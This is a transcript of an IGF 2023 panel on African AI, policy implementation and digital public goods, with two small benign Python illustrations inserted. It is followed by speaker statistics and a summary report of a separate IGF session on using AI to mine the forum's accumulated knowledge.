Good afternoon. So we lost you now. We can’t hear you. Okay, can you hear me now? Yes, yes, go for it. Okay, great. I’ll quickly get to your question, Mark. Very interesting discussion from the rest of the panelists; good to hear about the number of things you’ve been working on. I just want to say from the get-go that the idea of AI technologies, on the continent or globally as a whole right now, being digital public goods is still very much an ideal that we are, in a sense, working towards, because that’s not really a reality at the moment. A lot of what you would describe as making something a digital public good, being open, being inclusive, is not really what’s happening at the moment. So, trying to relate that to the SDGs, to how the technology is being adopted here on the continent along the lines of intersection between different partners, and to how they’re possibly working towards the realisation of different SDGs: I do see a number of examples, for example, here in Uganda, where I’m based in Kampala, or just across the African region as a whole. I see partnerships between academia and practice, especially. I’ll give one example, the Lacuna Fund with the Makerere AI Lab. Here in Kampala, Uganda, I see a lot happening at the Makerere AI Lab, and a lot of that is in partnership with different partners. For example, the Lacuna Fund projects, which are building natural language text and speech datasets, are, I think, working in collaboration with Google. So a lot of what I see is within the academia space over to the private sector.
And as civil society, we come in to do more advocacy, speaking both to issues around datasets and to ethical considerations in the adoption of these technologies. So I think it’s something that is springing up, in a sense. It’s not happening on a very grand scale, but it’s something that we see coming up. And I guess we can hope that, especially with more work being done around the space of advocacy, we will see more of that happening over the coming months and years.

Moderator – Mark Irura:
All right. Thank you so much. Thank you so much, Bobina. And I come back to you, Susan. I’ll act like a journalist and say, I’m sure the people in the room are wondering. Probably, as people in Kenya will say, “Kenyans are asking,” as if it’s one person. How do we move from these frameworks to the actual implementation? And what are some of the things that you’re doing in this regard so that they don’t remain on paper?

Susan Waweru:
Mark, that’s a good question. And it’s one I’m passionate about. I’m known as the get-it-done girl, so my reputation is for moving things from paper to actual implementation and execution. Death in the drawer is a concept we learn in policy and in business administration, where you can have the best policies, the best strategies, frameworks, and legislation, all documented. And that is one thing you see in Kenya: we have some of the best documentation, even borrowed by the West. But implementation becomes one of the biggest challenges, not only in AI but across the tech space. So, how you get it done, from my perspective: one, leadership matters. If you don’t have leadership commitment, getting what is on paper out to where it can be physically seen will be a challenge. So what we do, as the technocrats in government, is seek to influence leadership. And we have some of our parliamentarians here with us. We seek to influence them on the importance of what has been documented. Because if the policy is done at the strategy level and just benched, then it becomes a challenge. But as technocrats, influencing the leadership on the importance of the documents that have been prepared is key. Once you get the leadership buy-in, then it trickles down to the user and citizenry buy-in. Because those using the frameworks matter: for example, the Data Protection Act is an act passed by parliament to be implemented, and it affects majorly data controllers and data processors, who are largely entities. So if we don’t get entities on board through awareness creation and advocacy, then that document doesn’t get implemented. And one way to get user buy-in, and we’ll talk about this later, is to have a free flow of information. To be transparent in what you do. To be very simple and clear on what the compliance journey is for data protection and for privacy. So, leadership buy-in, leadership matters; citizenry buy-in. Another thing is collaboration.
Partnerships with organizations and entities who have executed that which is in our documentation. Once we collaborate, for example, with other bodies, other government agencies, for example, who have implemented their AI applications successfully in the Kenyan government, then we collaborate with them on how to do that. Currently in Kenya, I can say this get-it-done attitude is at high gear. In the tech space, the government has what it calls the Digital Transformation Agenda. It’s spearheaded by the presidency, with the president himself overseeing and calling out most of the projects. Currently that Digital Transformation Agenda is at infrastructure development stage and onboarding all government services onto one platform which we call eCitizen. And he gives specific timelines on when he wants all of that done and checks them himself. That’s the leadership. That’s the level at which the government of Kenya is interested in digitization towards moving to an intelligent government where we don’t react to public sector needs. We preempt them and provide them even before they happen. Those are the three ways, Mark, I would say, how we get documentation to the ground.

Moderator – Mark Irura:
Thanks, Susan. Of course, today we’ll wait to see what you’ve been doing as well with AI itself. I hope we can get a chance to see that if we don’t run out of time. I come to you, Dr. Meena, and I ask about training and capacity building. What does that mean to you for different stakeholders, whether they’re in policy or at the level of the graduates that we have? We know a lot of them have to go overseas, outside the continent, to get their training to be able to come back and be part of an ecosystem. So what does that look like for you right now, especially with the risks and the potential harms of AI being apparent? Thank you.

Meena Lysko:
Thank you, Mark. I’m really looking forward to sharing some of the programs we’re busy with currently, but I’ll hold back and address this particular key question. The emphasis should be on including ethics across the AI system’s lifecycle. That should be from conception all the way through production, and it’s a cycle. It means that it should be a continuous, sustained initiative throughout the working stages of a particular system. Within some of the programs, for example, the one I’m currently on, we’ve incorporated a module on AI ethics and bias. Now, albeit that we are looking at very hands-on development, we also looked at the soft skill, if I can call it that, where we need our participants, our trainees, to understand that adopting ethics in AI is more than just knowing ethical frameworks and the AI systems lifecycle. You require awareness of ethics from the perspective of knowledge, skills, and attitudes. That means knowledge of laws, policies, standards, principles, and practices. And then we also need to integrate professional bodies and activists with that, and we have a number within South Africa itself. For example, we have an overarching AI representative body within South Africa. We have, I think it’s called DepHub, in South Africa, which focuses on AI policies and data recommendations. And then we must also look at the application of ethical competence: we need an ethically tuned organizational environment. And in tune with that as well, we have to look at ethical judgment. So we’ve been emphasizing that participants in our training program are fully aware of these aspects. Their projects and developments need to be guided by ethical principles and philosophies; they need to be imbued with that. In the projects that they are in, they have to apply ethics throughout the design and development process.
And to ensure that, while we are training people in AI and data science, for example, we’ve also made a point of inviting industry experts into our sessions to engage with the participants, so that there is an encouragement of healthy knowledge sharing. But also, in the opposite direction, there are youthful perspectives shared that promote morally sound solutions, from people not yet contaminated by what goes on in the market purely for profit. And that’s where we’ve seen it happening within our training programs as a very successful sharing mechanism. Thanks, Mark.

Moderator – Mark Irura:
Thanks, Meena. And I come to you, Darlington, and I ask this question that touches a little bit on what Dr. Meena said about working with industry experts. So you have a bucket where we have the SDGs, we have AI and the problem that needs to be solved. In your case, you talked about radiology and being able to read and interpret what those images mean. And then we have the complexities of running a business. So talk to us a little bit about strategies, if any exist, to align this in the work that you’re doing. If you’re still there. Darlington is not there. Okay, then I would move to you, Bobina. Are you online?

Zulfa Bobina:
Yes, I am.

Moderator – Mark Irura:
All right. I will ask a question that is related to the ethical deployment of AI. What are you doing as civil society in this regard to make sure, for example, that people will not be left behind by digitization, and that children will learn at an earlier age about the risks of these technologies, even as they begin to use them? Over to you, Bobina.

Zulfa Bobina:
Okay, thank you, Mark. I hope you can hear me. That’s a really profound question, because I think it goes over a lot of the things we’re trying to unpack throughout this conversation, and Dr. Meena was also going over a number of the ethical concerns and how these are being navigated. But I’ll say, with the work we do at Pollicy, a lot of what we do is research which is sociotechnical, in a sense. So we’re not developers, but we look at the landscape and at how these technologies are being adopted and deployed in different communities. So in our role, a lot of what we’re doing is, on one hand, knowledge production with our research, and advocacy on the other. With the knowledge production, very broadly, the things we’re looking at very critically right now, in terms of addressing the ethical concerns, include bringing communities to understand the workings of these technologies, because we think it’s very elitist to… I think we always compare this to the health conversation, where there is a disease outbreak and then governments find a language to communicate it to the general population, even when there is all this scientific language about it. So we’ve been trying to think around this: how do we come up with language so that the ordinary person within the country, or anywhere else across the continent, will be able to understand these technologies and how they impact them day-to-day, how they can incorporate them in their lives, and how this could be something to benefit their lives. On a broader scale, given the time I have, just going over those two points of knowledge production and advocacy, I think we’re looking very critically at issues of, one, invisibilized workers.
This is really a conversation about automation and the invisible workforce behind a lot of these technologies that we’re being told are working frictionlessly. So we are trying to get the understanding and buy-in of government, which is supposed, in a sense, to regulate these technologies that are being adopted, on behalf of, for example, the people doing this work, this invisible work. So that’s one of the things we’re looking at. The other is the harmonization of collective and individual rights. A lot of the frameworks that are being developed, and I think this is a trickle-down from the West, where we’re getting a sort of blueprint from the GDPR, et cetera, are driven towards individual rights. I think that’s problematic. Especially as society is datafied more and more, there is a need for us to move towards a place where we harmonize both collective and individual rights, and that would bring in a participatory approach. Thank you.

Moderator – Mark Irura:
Hi, Bobina. Can you hear me?

Zulfa Bobina:
Yes, I can hear you. I don’t know if you can hear me.

Moderator – Mark Irura:
Yeah, I lost you temporarily. Just repeat the last sentence as you wind up. Okay. No, we’re here with you. Please, please. Yeah, yeah. Ah, I think we lost Bobina. Okay. Darlington, I see you’re settled now. Okay, perfect. Cool. I had a question for you, which I think you did not hear, but I will take two questions from the audience. You can prepare them if anyone has a question, probably one from the room and one online. My question to you, Darlington, before we lost you in cyberspace, was: we have the SDGs, the Sustainable Development Goals, we have you as a business, and then we have AI, and not all the time are these interests aligned. Sometimes it’s the business which has to take precedence. Sometimes, like in the problem that you gave us, you’re trying to solve a really impactful problem, and at times you just have to comply with certain regulations. What are some of the strategies that you have to align all of this in solving the problems that you want to solve and also aligning with the SDGs?

Darlington Akogo:
Yeah, I mean, that’s a very, very important question. The initial strategy is: make sure your business is built around solving a problem in itself, a problem connected to the SDGs. Then, fundamentally, there’s no conflict to begin with. If you are profiting off of something that is damaging the environment or destroying the health of people, then alignment becomes a really, really big problem. But if fundamentally you have a social enterprise, a business built around solving a problem, then it’s different; in our case, the whole business at Mino Health is built around being able to provide healthcare and make it accessible to everyone, and at KaraAgro we’re making sure we solve food security. Outside of that, there are definitely instances where maybe if you took one route, you’d make a lot of profit, but the impact might not be so much. And then there’s another route where, you know, it might not be the case. So I can give you a real-world example. We work on drug discovery with AI. There’s a scenario we’ve looked at where you could take certain conditions, work on new drugs for them, and it’ll be very expensive. There are certain medications where a few tablets cost tens of thousands of dollars, hundreds of thousands, even millions, and you could sell them to a few people and make a lot of money. But then the question is, are you actually building any equitable access to healthcare by doing that? And so when it comes to those scenarios, you need to have guiding principles. What you can do is have an internal constitution that says: this is our moral backbone and we need to live by it. And the board is basically obliged to make decisions off of it. So even if the CEO veers off by not following that internal code of conduct, that constitution, they could be voted out. And depending on how serious you are about this, you can solidify this within the company’s constitution, and then it will be fully followed.
Some people go a step further, even the way you register the business. So there’s a category in some countries where you can register as a social enterprise or, you know, for profits, but for public good, I think the term is. And when you do that, it means that your primary obligation is not to shareholders and investors, it’s to the public. So those are legal ways of making a binding to make sure that you are actually focused on addressing the SDGs and not just, you know, maximizing profits.

Moderator – Mark Irura:
Thank you, thank you. And I guess what I’m hearing from you as well is the ability to also consider self-regulation, especially in this space, as you innovate, as you solve these problems, even where there might be a lacuna in the law or in the frameworks that exist. I don’t know if there are any questions coming in from the room to begin with or from online. Yes. Hi, Leah.

Audience:
Hi, everyone. I’m Leah from the Digital Public Goods Alliance. And I think we should also quickly talk about infrastructure. I mean, apparently we had some troubles here, which is a good bridge to talk about data infrastructure and access to compute. Obviously you need both of them in order to democratize the use of, the development of, and also the benefits of AI in an African or global South context. So how do you deal with these challenges in your project, in your country context? Thank you.

Moderator – Mark Irura:
So I will open up that question to anyone to take it up. Yeah.

Susan Waweru:
Thank you for the question. In Kenya, one of the things I mentioned under the Digital Transformation Agenda is that the first building block is infrastructure. So I know that for the next five years, the government has the last-mile connectivity project, which seeks to bring fiber connectivity to every market, every bus station, every public entity. That will give free wifi, and that gives people access to digital public goods. So that was adopted as one of the first things to be done, because you can’t develop digital public goods without accessibility. Accessibility, equal accessibility, is very important, and I think it is one of the bedrocks to making AI and other tech and DPGs successful. So that’s what I know from the Kenyan experience that’s happening.

Moderator – Mark Irura:
Anyone else? Dr. Mina, would you like to come in?

Meena Lysko:
Yes, sure, Mark. I was looking for the Zoom raise-hand button, but thank you for asking me as well. So from a South African perspective, let’s see if I can turn the video on. From a South African perspective, you may have read in the news or be aware that we have this thing called load shedding. It’s a term coined within South Africa for a structured approach to managing power consumption within the country when there are constraints on the national grid. So this brings about, in addition to the challenges we already have globally with infrastructure to ensure connectivity, the question of redundancy. But with redundancy, we also need to ensure that it is affordable, and it must be affordable at every latitude and longitude, to the decimal of latitude and longitude, so that it reaches every sphere of life within the world, and, in our context, within South Africa.

In running our bootcamp, for example, a program we are currently doing, it has been a challenge to run a hybrid program where people cannot stay online for the entire duration of the training because of this matter of connectivity. Fortunately, we record sessions so they can follow up after the session. So we have solutions around it. One aspect is infrastructure, but it is also about redundancy. And then there is the question of our reliance, in education and training, and now in 4IR, on infrastructure. What happens if someday, for whatever reason, and we have seen this through natural disasters in various parts of the world, infrastructure is affected? How do we then manage to come back online as expediently as possible? Because in this 4IR, in this AI- and data-evolved world, our reliance is fully on infrastructure to keep global economies going.

So the risk is quite high, and I think that is a call for action to look into this. Going to the opposite extreme, there is the question of the impact infrastructure has on the environment. Energy consumption, for example, is massive within this context. So these are the sorts of things that I think we have to be very mindful of and look into responsibly; we talk about responsibility, so we have got to be responsible about that as well. Thank you, Mark.

Moderator – Mark Irura:
Thank you, thank you. I don’t know if Sumaya, you can find one question for us online to read out.

Audience:
Thank you, Mark. We have a few questions online. Okay. So the first one is, do we have an AI policy in Kenya? Question mark. If yes, and legislation to operationalize the policy. Question number two. How should human workers perceive and interact with robots working alongside them? Question mark. Are these robots supposed to be treated as tools or colleagues by the humans working with them? So the question’s here. Thank you.

Moderator – Mark Irura:
Susan, I’ll direct the one for Kenya to you.

Susan Waweru:
Kenya has what is called the Digital Master Plan, and in it are some aspects about AI. Recently, about two weeks ago, the government, led by the president, instructed that AI legislation be drafted, so that is ongoing work. Further, there’s a central working group that’s looking at all tech-related legislation, policies, and strategies, and one of the things that will be considered is putting an AI policy in place. So the answer is yes: within the Digital Master Plan we have aspects of an AI policy, and there are efforts, I think within this year, to have legislation, policies, and strategies that will guide that.

Moderator – Mark Irura:
Thank you. And then the second question is existential, right? Should humans interact with robots? We already do, right? We already do, to some extent. If there are questions online and in the room, we will take them and continue to answer them, but I want to move on and ask our panelists and everyone who has shared here to take a minute and just wrap up before we leave the room. We wanted at least to hear what’s happening. We wanted to show you what’s happening. And we wanted you to appreciate that we are not just talking in Africa; we are doing something. And I don’t know, maybe I begin with you, Yilmaz. If it’s okay, just a minute, yeah.

Yilmaz Akkoyun:
Yes, thank you so much. It’s a real privilege to listen to these different examples and use cases, because this was really inspiring for me, hearing more about creating African AI and how it works, and also about the challenges and how you deal with them. This was super helpful. I would like to stay in close touch with you to continue this conversation; I think it’s just the starting point. And I’m so happy to see the success stories already. I can only congratulate this panel, you for the amazing moderation, and the different panelists who also participated remotely. Let’s please continue this conversation. I absorbed so much, because I hadn’t heard much about it in advance. And yeah, this is why we are also here, to get in touch and join the IGF. I think it’s just the beginning.

Moderator – Mark Irura:
Thank you. Sumayya, are we going to put it up? Are we going to put it up? Okay, good. As you prepare, I’ll go online and ask Bobina for her closing remarks.

Zulfa Bobina:
Sure, thank you very much again for having me be a part of this conversation. I think, like someone mentioned earlier, there have been a lot of conversations happening here in Kyoto around AI technologies as a whole. So to be talking about the direction of how we get to realize this as a digital public good, and indeed of benefit to everyone, is a step forward. We are coming from the initial conversations around digitization, and now, as the public as a whole engages with data more and more, how do we let the conversation evolve as the technologies are evolving as well? So for me, I’m very excited to hear about some of the things that are happening here and there across the continent, very excited to see more of that, and very happy to keep in touch with you all to let this conversation keep going. Thank you.

Moderator – Mark Irura:
Thank you so much. And then I move to you, Dr. Mina.

Meena Lysko:
Thank you, Mark. In the context of the Sustainable Development Goals, our training has aimed to support quality education, industry innovation and infrastructure, zero hunger, and responsible consumption and production. I take with me today what you have said, and I think that could be a nice global call: self-regulate as you innovate. Our post-training feedback from previous programs, as well as feedback from participants in our current program, is giving a glimpse of how paying it forward is being achieved. And I want to sum up by saying this: proprietary AI systems are generally used to make money, enable security, empower technology, and simplify tasks that would otherwise be mundane and rudimentary. But if AI ecosystems could be designed to take advantage of openly available software systems, publicly accessible datasets, generally openly available AI models and standards, and open content, that would enable digital public goods to make generally free works available for Africa, and hence contribute to sustainable continental and international digital development. Thank you, Mark.

Moderator – Mark Irura:
Thank you. And then I move to you, Darlington.

Darlington Akogo:
Yeah, so I think we are in one of the best moments in human history, where we are building technology that finally digitizes what makes us special as a species, and potentially even surpasses it. The potential is beyond anything we can think of. We are, what, seven years away from the deadline of the SDGs, and there’s a lot of realization that we are not close to meeting the targets. I strongly believe that if we can double down on properly using AI ambitiously, whether in Africa, Asia, or anywhere in the world, if we can seriously double down and invest properly in it, we can address just about everything on the SDGs. There’s no limit to how far AI can go, especially in the context of foundation models now and how general they are. So I would say let’s double down on it, but let’s do this in a very responsible and ethical way, so that as we are solving the SDGs, we don’t create a new batch of problems for the next set of targets. So let’s leverage AI and solve the SDGs.

Moderator – Mark Irura:
Thank you so much. And before Susan closes for us: they have been working on an interesting project, and maybe she can tell us about it and then give her closing remarks. It’s being projected before you. It’s a tool that can help citizens learn about the Act, and it can communicate in Sheng. Sheng is a mixture of Swahili and English. So over to you, Susan.

Susan Waweru:
Thank you, Mark. So just to quickly run through: one of the things we are developing is an AI chatbot to provide the services that the ODPC should provide. This chatbot uses natural language processing, with large datasets to train it on the questions the citizenry may have about the ODPC. It speaks both English and Swahili, the two official languages in Kenya. So, Sumai, if you just may, ask it: what is a data controller? This is an awareness tool. It’s a tool to enhance compliance. It’s a tool to bring services closer to people, and it overcomes challenges such as the eight-to-five working day: as a data controller or a data processor seeking to register or make a complaint, you’re not limited to working hours; that can be done at any time. It gives information, it explains processes, and it’s all free of charge, giving it accessibility. So to just end the session, my clarion call is that AI is inevitable. We’re already using it; it’s already on our phones, it’s already in our public services. So it’s inevitable. The main thing I would say is to make it human-centered. Even when we were developing the chatbot, we put ourselves in the shoes of the citizen more than thinking of the benefit of the organization. So if we can enhance human-centered AI and bring up the benefits more than the risks, that would be best. The way to do this is to demystify AI, and a panel such as this is one of the ways we do that. You demystify it, because currently it’s seen as a scary big monster, which is not what it truly is; that’s what it could be, but it has many more benefits, especially for public service delivery. And with that, Mark, I just want to say thank you to you and the organizers, Sumeya and Bonifaz, and largely to the IGF.
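Susan describes the chatbot only at a high level, but its core idea, matching a citizen’s question in either language to a vetted answer, can be sketched minimally. The question-and-answer pairs, the Swahili wording, and the `answer` function below are illustrative assumptions, not the actual ODPC system:

```python
# Toy bilingual FAQ lookup, loosely inspired by the ODPC chatbot described
# above. All entries and the matching logic are illustrative assumptions.

FAQ = {
    "en": {
        "what is a data controller":
            "A data controller determines the purposes and means of processing personal data.",
    },
    "sw": {
        "msimamizi wa data ni nini":
            "Msimamizi wa data huamua madhumuni na njia za kuchakata data binafsi.",
    },
}

def answer(question: str, lang: str = "en") -> str:
    """Normalize the question (lowercase, drop trailing '?' and spaces) and look it up."""
    key = question.lower().strip(" ?")
    return FAQ.get(lang, {}).get(key, "Sorry, please rephrase your question.")

print(answer("What is a data controller?"))
```

A production system would replace the exact-match lookup with semantic retrieval over a larger corpus, but the availability argument Susan makes (answers at any hour, free of charge) holds even for this trivial version.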

Moderator – Mark Irura:
Thank you so much. Let’s give a round of applause to everyone who’s contributed to this conversation. I hope the session has been valuable to you. I hope you learned something. And I hope we can connect. I hope we can talk more about the topic. Thank you so much. And thank you online as well for joining us. Thank you so much. Bye.

Speaker | Speech speed | Speech length | Speech time
Audience | 183 words per minute | 189 words | 62 secs
Darlington Akogo | 185 words per minute | 1254 words | 406 secs
Meena Lysko | 134 words per minute | 1635 words | 731 secs
Moderator – Mark Irura | 148 words per minute | 2163 words | 876 secs
Susan Waweru | 161 words per minute | 1629 words | 606 secs
Yilmaz Akkoyun | 146 words per minute | 919 words | 377 secs
Zulfa Bobina | 182 words per minute | 1291 words | 427 secs

IGF’s knowledge unlocked: AI-driven insights for our digital future | IGF 2023 side event



Full session report

Markus Kummer

The initial stages of the Internet Governance Forum (IGF) primarily focused on connectivity and internet access, with no consideration given to artificial intelligence (AI). During that time, the main concerns revolved around ensuring that people had access to the internet and were able to connect. However, as time went on, the landscape changed significantly with the advent of apps, video streaming, smartphones, and other technological advancements facilitated by AI. These developments highlight the growing importance of AI in shaping the digital world.

Despite the progress made in connecting people to the internet, challenges still exist in bringing the last billion individuals online. The assumption was that the industry would take the lead in connecting this population, but it has proven to be a difficult task. One of the major hurdles in this endeavor is language and cultural diversity. The remaining individuals who are not yet connected to the internet predominantly come from non-English speaking countries. Overcoming these linguistic and cultural barriers is essential to ensure universal access to the internet.

The Tunis agenda, a significant document related to Internet governance, outlined a broader definition of the concept beyond just the management of the Domain Name System (DNS) and internet protocol resources. It acknowledged that Internet governance encompassed a range of issues concerning the use and abuse of the internet. This expanded understanding remains relevant and continues to guide discussions and decision-making in the field.

The IGF has accumulated an immense amount of data over the years. It has been suggested that this data should be mined for valuable insights. In 2011, Vint Cerf, one of the founding fathers of the internet, highlighted the importance of data mining during the Nairobi IGF. Data mining involves extracting meaningful information and patterns from extensive datasets. Given the rich and diverse dataset available within the IGF, there is the potential to uncover valuable insights that can inform future policies and strategies around internet governance.

AI applications can play a crucial role in mining and categorizing the vast amount of data accumulated through the IGF. Markus Kummer, a prominent figure in internet governance, has mentioned the publication of a book summarizing the knowledge generated through the IGF. This highlights the challenge of effectively mining and utilizing the wealth of information available. By leveraging AI tools, the process of data mining and categorization can be significantly enhanced, allowing for more efficient and accurate analysis of the vast dataset.

In conclusion, while AI was not initially considered during the early stages of the IGF, its importance has become increasingly significant with the evolution of the digital landscape. Challenges persist in connecting the last billion individuals to the internet, particularly in dealing with language and cultural diversity. The broader definition of internet governance outlined in the Tunis agenda remains valid and continues to shape discussions within the field. The immense data accumulated through the IGF presents an opportunity for valuable insights when mined and analyzed effectively, with AI applications serving as useful tools in this process.

Jovan Kurbalija

The importance of preserving the knowledge generated during Internet Governance Forum (IGF) sessions was emphasised. This knowledge has the potential to assist and benefit communities affected by digitalisation issues. The Diplo Foundation, in collaboration with Markus Kummer, has been documenting IGF sessions since 2006. To facilitate this process, AI technology is employed, enabling the creation of summaries, reports, and daily digests. The AI system has the capability to codify and translate the arguments presented during sessions, resulting in the development of a comprehensive knowledge graph.

The knowledge database generated from IGF discussions is considered a public good that belongs to all stakeholders. However, it was noted that this valuable resource is currently underutilised. Therefore, there is a collective call for the initiation and promotion of the IGF knowledge database, aiming to fully harness its potential benefits.

While there are extensive discussions about the impact of Artificial Intelligence (AI) on humanity, the need to explore AI as a practical tool and gain a comprehensive understanding of its functionalities was recognised. It was suggested that the Internet Governance (IG) community should focus on delving into the practical aspects of AI, rather than mere speculation about its potential impacts.

To enhance knowledge sharing and coherence, it was proposed that an AI tool be developed to connect and compare discussions across various IGF sessions. This tool would help identify commonalities, link related topics, and facilitate a more comprehensive understanding of the subject matter.

The use of AI for the session report system was viewed positively, as it allows experts to collaborate with AI technology to generate interactive reports. These reports include detailed breakdowns per speaker, narrative summaries, and discussion points, as well as information regarding speech length and speed. The AI system continuously learns and improves through the integration of corrective feedback.

The IGF has evolved into a knowledge base that holds significant influence over Internet-related organizations. It serves as a platform for learning, capacity building, and the provision of global resources. Notably, the IGF’s culture of respect and engagement, which fosters a listening culture and promotes the acceptance of diverse opinions, was highly appreciated. There was a suggestion to utilize AI and human expertise to propagate this culture among younger generations, strengthening the overall impact and sustainability of the IGF’s mission.

In conclusion, the extended summary highlights the importance of preserving knowledge generated during IGF sessions and emphasizes the collaborative efforts between the Diplo Foundation and AI technology in documenting and summarizing these sessions. It underlines the call for the initiation and utilization of the IGF knowledge database, as well as the need to explore the practical aspects of AI. The potential benefits of an AI tool to link and compare discussions across various sessions are recognized. The positive perspective towards utilizing AI for the session report system is noted, along with the IGF’s influence as a knowledge base and its culture of respect and engagement.

Sorina Teleanu

The Internet Governance Forum (IGF) held discussions on the role of Artificial Intelligence (AI) in society, with a focus on its benefits rather than its potential to replace humans. The sentiment expressed during the discussions was positive.

Speakers at the IGF emphasized the need to approach AI in a practical manner and avoid cliches. They encouraged participants to explore how AI actually works, rather than focusing solely on its ‘magic’. This proactive stance aims to deepen understanding and harness the full potential of AI.

There was a consensus among the speakers that AI is not detrimental to jobs, but rather a tool to assist humans. They dismissed the idea of AI taking over human jobs in the near future and highlighted the importance of AI supporting and enhancing human capabilities.

One significant concern raised at the IGF was the underutilization of the valuable information produced. While the forum generates a wealth of knowledge, it was acknowledged that much of it remains unused or unexplored. This raises questions about the effectiveness of disseminating and utilizing the knowledge generated by the IGF.

The speakers also stressed the potential of technology in maximizing the knowledge acquired by the IGF over the years. They emphasized the need to leverage technology to track the evolution of discussions and enhance understanding of topics such as the digital divide. By harnessing technology, the wealth of knowledge accumulated by the IGF can be effectively utilized to contribute to the achievement of the Sustainable Development Goals.

Additionally, there was an emphasis on the need to move the discussions forward and avoid repetition. The speakers highlighted technology as a means to facilitate progress, avoid cliches, and promote innovation in governance and societal debates. Using technology as a starting point for discussions can provide an overview of previous debates and lay the groundwork for more in-depth and constructive conversations.

In conclusion, the discussions at the IGF established that AI will bring about benefits without replacing humans. The importance of approaching AI in a practical manner, avoiding cliches, and harnessing technology to maximize the utilization of knowledge were key takeaways. Moving forward, the IGF aims to leverage technology to advance governance and effectively address societal challenges.

Wim Degezelle

During discussions about Internet Governance Forum (IGF) activities, it was identified that there is a need to improve the codification and collection of knowledge. The participants emphasised the importance of moving beyond mere discussions and working towards tangible outputs. This indicates a desire to generate concrete reports and outcomes from IGF discussions.

Another point raised was the need for better coordination and consolidation of similar discussions that take place at different workshops within the IGF. It was observed that multiple sessions on internet fragmentation often resulted in repeated messages about collaborative work, albeit using different phrasing. The crowded schedule of IGF sessions was identified as a challenge, making it difficult to establish links to previous discussions from past years or sessions. Therefore, participants suggested that better coordination and consolidation of similar discussions would improve efficiency and reduce redundancy within the IGF.

Participants also acknowledged the potential role of AI and other technologies in enhancing knowledge management. It was noted that during meetings, a specific tool was able to break down participants’ words into distinct arguments and label key topics. Additionally, the tool was capable of associating relevant Sustainable Development Goals (SDGs) with the discussions. This demonstrates how AI and technology can help categorise and link discussions, facilitating better knowledge management within the IGF.
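The labelling step described above, breaking contributions into arguments and associating them with SDGs, can be illustrated with a toy keyword matcher. The keyword lists and the `tag_sdgs` function are illustrative assumptions, not DiploGPT’s actual pipeline, which would use far richer language models:

```python
# Toy keyword-based SDG tagging, loosely inspired by the session-labelling
# tool described above. Keyword sets are illustrative assumptions.

SDG_KEYWORDS = {
    "SDG 4 - Quality Education": {"education", "training", "skills"},
    "SDG 9 - Industry, Innovation and Infrastructure": {"infrastructure", "connectivity", "innovation"},
    "SDG 10 - Reduced Inequalities": {"inclusion", "divide", "marginalized"},
}

def tag_sdgs(argument: str) -> list[str]:
    """Return the SDG labels whose keywords appear as words in an argument."""
    words = set(argument.lower().split())
    return [sdg for sdg, keywords in SDG_KEYWORDS.items() if words & keywords]

print(tag_sdgs("Last-mile connectivity is key infrastructure"))
```

Even this crude matcher shows how, once every argument carries SDG labels, discussions from different sessions can be grouped and compared, which is precisely the cross-session linking the participants asked for.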

Moreover, there was a shared positive sentiment towards the potential of the tool to compare and link discussions from different sessions. Participants expressed a desire for the tool to identify common themes across multiple sessions and suggest comparative analysis. This highlights the potential for AI and technology to further enhance knowledge management within IGF by providing a comprehensive and comparative understanding of discussions.

In conclusion, the discussions surrounding knowledge codification and collection within IGF activities stressed the need for tangible outputs and better coordination of similar discussions. Furthermore, the value of AI and other technologies in categorising, linking, and enhancing knowledge was recognised. The potential for these technologies to compare and link discussions from various sessions was also highlighted. Overall, this analysis provides insights into improving knowledge management within the context of IGF.

Audience

The Internet Governance Forum (IGF) has become a vital platform, enabling stakeholders to participate and contribute to policy discussions related to the internet. This inclusive forum allows dialogue and collaboration among governments, non-governmental organizations, businesses, academic institutions, and individuals interested in shaping the internet’s future.

One key aspect that sets the IGF apart is its ability to influence internet-related organizations. Stakeholders have found the IGF to be an important channel for contributing to policy development and decision-making processes. This influence has been significant, shaping the strategies and actions of internet governance entities.

The IGF’s positive impact is reinforced by its evolution and longevity, surpassing initial expectations. It was originally anticipated that the IGF would only last for a limited period, but its resilience and continued success prove its value. The IGF is now regarded as a model worth emulating, leading to the establishment of similar forums worldwide and the contribution of resources from various regions, strengthening global internet governance.

Another significant aspect of the IGF is its role in promoting global collaboration and discussion. The forum provides a platform for stakeholders to engage in fruitful dialogue, allowing for agreement and disagreement. Through open exchanges and constructive debates, the IGF facilitates consensus building, shaping policies that impact internet governance. Additionally, the IGF’s influence extends beyond its immediate activities and impacts other internet governance organizations operating in related domains.

In conclusion, the Internet Governance Forum (IGF) has become a valuable knowledge base and a platform for global collaboration and discussion. Its importance lies in bringing together diverse stakeholders, providing opportunities for active participation, and influencing internet-related organizations worldwide. The continued success and growth of the IGF over the past two decades highlight the need for its continuation and evolution in the future.

Anja Gengo

The Internet Governance Forum (IGF) is an extensive database that contains a vast collection of reports, records, and documents on digital inclusion. For the past 18 years, the IGF has been actively producing various types of reports and documents, which serve as significant indicators of the current state of affairs and future directions in the field. This highlights the IGF’s commitment to remaining up-to-date and providing valuable insights into the digital inclusion landscape.

One argument presented is that artificial intelligence (AI) can be a valuable tool in managing the IGF’s massive database, provided that it is a trusted system. AI has the ability to process data quickly and yield accurate results, thereby enhancing the IGF’s data processing capabilities and achieving a higher level of inclusion in its processes.

Furthermore, there is a strong emphasis on the importance of identifying and including underrepresented and marginalized groups in the IGF processes. The IGF Secretariat acknowledges the lack of participation from certain countries, disciplines, and target groups and is making efforts to map these missing entities and onboard them. This commitment underlines the IGF’s dedication to promoting inclusivity and reducing inequalities in the digital space.

Anja Gengo, an observer, is impressed by the examination of speech length and speed in the discussions. This analysis provides insights into communication dynamics and has the potential to improve the effectiveness of discussions during IGF events. Additionally, Gengo is excited about a mini competition, the outcome of which is eagerly anticipated.

Overall, the analysis of the IGF’s database and its efforts towards inclusion are deemed highly valuable for the IGF’s long-term utility. It not only enhances decision-making but also supports the IGF in effectively addressing the challenges and opportunities within the digital inclusion landscape.

Session transcript

Jovan Kurbalija:
